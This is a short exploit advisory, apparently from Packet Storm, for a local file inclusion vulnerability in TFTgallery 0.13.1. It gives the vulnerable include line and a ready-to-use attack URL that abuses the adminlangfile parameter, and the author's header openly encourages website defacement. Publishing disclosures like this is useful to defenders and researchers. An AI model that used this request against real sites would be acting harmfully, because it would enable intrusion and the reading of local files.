TFTgallery version 0.13.1 suffers from a local file inclusion vulnerability.
f09b64e225e3c5868a573117b7677aa62586f97a4423d22572b6da257862ec9b# TFTgallery <= 0.13.1 Local File Inclusion (LFI)
# 28/10/2010
# PHP script available on SourceForge. TFTgallery 0.13 : http://prdownloads.sourceforge.net/tftgallery/tftgallery-0.13.zip
# TFTgallery 0.13.1 patch : http://www.tftgallery.org/versions/tftgallery-0.13-to-0.13.1.zip
# By Havok, from France.
# KAS-D10 à tous les leets. Hey lamers, i hope that it will help you to notify another stupid defacement on Zone-H. Cheers mates!
# Enj0y!
# Wanna contact me? h4v0k1337<at>gmail<dot>com
#
## register_globals=On (Who said "what a useless vulnerability!" =()
"include_once "language/" . $adminlangfile;" (@thumbnailformpost.inc.php (line 3) for the win ;)).
http://www.IM-G0ING-T0-G3T-HACK3D.COM/TFTP-GALLERY-PATH/admin/thumbnailformpost.inc.php?adminlangfile=[LFI]
Maybe some other vulnerabilities, too lazy to check at the moment, sorry =).
<END>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed